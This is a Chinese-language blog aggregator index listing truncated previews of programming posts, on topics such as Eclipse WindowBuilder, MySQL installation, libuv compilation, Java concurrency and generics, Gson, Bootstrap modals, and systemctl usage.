  • 可视化swing界面编辑 朱辉辉33 eclipseswing
          今天发现了一个WindowBuilder插件,功能好强大,啊哈哈,从此告别手动编辑swing界面代码,直接像VB那样编辑界面,代码会自动生成。       首先在Eclipse中点击help,选择Install New Software,然后在Work with中输入WindowBui
  • web报表工具FineReport常用函数的用法总结(文本函数) 老A不折腾 finereportweb报表工具报表软件java报表
    文本函数 CHAR CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 Number:用于指定字符的数字,介于1Number:用于指定字符的数字,介于165535之间(包括1和65535)。 示例: CHAR(88)等于“X”。 CHAR(45)等于“-”。   CODE CODE(text):计算文本串中第一个字
  • mysql安装出错 林鹤霄 mysql安装
    [root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm Preparing...                #####################
  • linux下编译libuv aigo libuv
    下载最新版本的libuv源码,解压后执行: ./autogen.sh   这时会提醒找不到automake命令,通过一下命令执行安装(redhat系用yum,Debian系用apt-get): # yum -y install automake # yum -y install libtool     如果提示错误:make: *** No targe
  • 中国行政区数据及三级联动菜单 alxw4616
    近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 哎,自己没办法动手写吧. 现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用   文件说明 lib\area.sql -- 县及县以上行政区划分代码(截止2013年8月31日)来源:国家统计局 发布时间:2014-01-17 15:0
  • 哈夫曼加密文件 百合不是茶 哈夫曼压缩哈夫曼加密二叉树
     在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤;   加密步骤:  1,统计文件中字节出现的次数,作为权值   2,创建节点和哈夫曼树   3,得到每个子节点01串   4,使用哈夫曼编码表示每个字节  
  • JDK1.5 Cyclicbarrier实例 bijian1013 javathreadjava多线程Cyclicbarrier
    CyclicBarrier类 一个同步辅助类,它允许一组线程互相等待,直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中,这些线程必须不时地互相等待,此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用,所以称它为循环的 barrier。 CyclicBarrier支持一个可选的 Runnable 命令,
  • 九项重要的职业规划 bijian1013 工作学习
    一. 学习的步伐不停止        古人说,活到老,学到老。终身学习应该是您的座右铭。        世界在不断变化,每个人都在寻找各自的事业途径。        您只有保证了足够的技能储
  • 【Java范型四】范型方法 bit1129 java
    范型参数不仅仅可以用于类型的声明上,例如   package com.tom.lang.generics; import java.util.List; public class Generics<T> { private T value; public Generics(T value) { this.value =
  • 【Hadoop十三】HDFS Java API基本操作 bit1129 hadoop
      package com.examples.hadoop; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoo
  • ua实现split字符串分隔 ronin47 lua split
    LUA并不象其它许多"大而全"的语言那样,包括很多功能,比如网络通讯、图形界面等。但是LUA可以很容易地被扩展:由宿主语言(通常是C或 C++)提供这些功能,LUA可以使用它们,就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快,从 而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函
  • java-从先序遍历和中序遍历重建二叉树 bylijinnan java
    public class BuildTreePreOrderInOrder { /** * Build Binary Tree from PreOrder and InOrder * _______7______ / \ __10__ ___2 / \ / 4
  • openfire开发指南《连接和登陆》 开窍的石头 openfire开发指南smack
    第一步     官网下载smack.jar包     下载地址:http://www.igniterealtime.org/downloads/index.jsp#smack 第二步     把smack里边的jar导入你新建的java项目中 开始编写smack连接openfire代码 p
  • [移动通讯]手机后盖应该按需要能够随时开启 comsci 移动
        看到新的手机,很多由金属材质做的外壳,内存和闪存容量越来越大,CPU速度越来越快,对于这些改进,我们非常高兴,也非常欢迎      但是,对于手机的新设计,有几点我们也要注意      第一:手机的后盖应该能够被用户自行取下来,手机的电池的可更换性应该是必须保留的设计,
  • 20款国外知名的php开源cms系统 cuiyadll cms
    内容管理系统,简称CMS,是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布,编辑和删除文章,即使您不需要懂得HTML和其他脚本语言,这就是CMS的优点。 在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统,以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 1. Wordpress WordPress的是一个功能强大且易于使用的内容管
  • Java生成全局唯一标识符 darrenzhu javauuiduniqueidentifierid
    How to generate a globally unique identifier in Java http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log http://stackoverflow
  • php安装模块检测是否已安装过, 使用的SQL语句 dcj3sjt126com sql
    SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。 本命令也列举数据库中的其它视图。支持FULL修改符,这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表,第二列的值为BASE T
  • 5天学会一种 web 开发框架 dcj3sjt126com Web框架framework
    web framework层出不穷,特别是ruby/python,各有10+个,php/java也是一大堆 根据我自己的经验写了一个to do list,按照这个清单,一条一条的学习,事半功倍,很快就能掌握 一共25条,即便很磨蹭,2小时也能搞定一条,25*2=50。只需要50小时就能掌握任意一种web框架 各类web框架大同小异:现代web开发框架的6大元素,把握主线,就不会迷路 建议把本文
  • Gson使用三(Map集合的处理,一对多处理) eksliang jsongsonGson mapGson 集合处理
    转载请出自出处:http://eksliang.iteye.com/blog/2175532 一、概述        Map保存的是键值对的形式,Json的格式也是键值对的,所以正常情况下,map跟json之间的转换应当是理所当然的事情。 二、Map参考实例 package com.ickes.json; import java.lang.refl
  • cordova实现“再点击一次退出”效果 gundumw100 android
    基本的写法如下: document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { //navigator.splashscreen.hide(); document.addEventListener("b
  • openldap configuration leaning note iwindyforest configuration
    hostname // to display the computer name hostname <changed name> // to change go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately dont forget to change /etc/hosts
  • Nullability and Objective-C 啸笑天 Objective-C
    https://developer.apple.com/swift/blog/?id=25   http://www.cocoachina.com/ios/20150601/11989.html   http://blog.csdn.net/zhangao0086/article/details/44409913   http://blog.sunnyxx
  • jsp中实现参数隐藏的两种方法 macroli JavaScriptjsp
    在一个JSP页面有一个链接,//确定是一个链接?点击弹出一个页面,需要传给这个页面一些参数。//正常的方法是设置弹出页面的src="***.do?p1=aaa&p2=bbb&p3=ccc"//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数,可能会不安全。要求实现src="***.do",参数通过其他方法传!//////
  • Bootstrap A标签关闭modal并打开新的链接解决方案 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    Bootstrap里面的js modal控件使用起来很方便,关闭也很简单。只需添加标签 data-dismiss="modal" 即可。 可是偏偏有时候需要a标签既要关闭modal,有要打开新的链接,尝试多种方法未果。只好使用原始js来控制。   <a href="#/group-buy" class="btn bt
  • 二维数组在Java和C中的区别 流淚的芥末 javac二维数组数组
    Java代码:   public class test03 { public static void main(String[] args) { int[][] a = {{1},{2,3},{4,5,6}}; System.out.println(a[0][1]); } }  运行结果: Exception in thread "mai
  • systemctl命令用法 wmlJava linuxsystemctl
    对比表,以 apache / httpd 为例 任务 旧指令 新指令 使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service 使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service 检查服务状态 service h
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他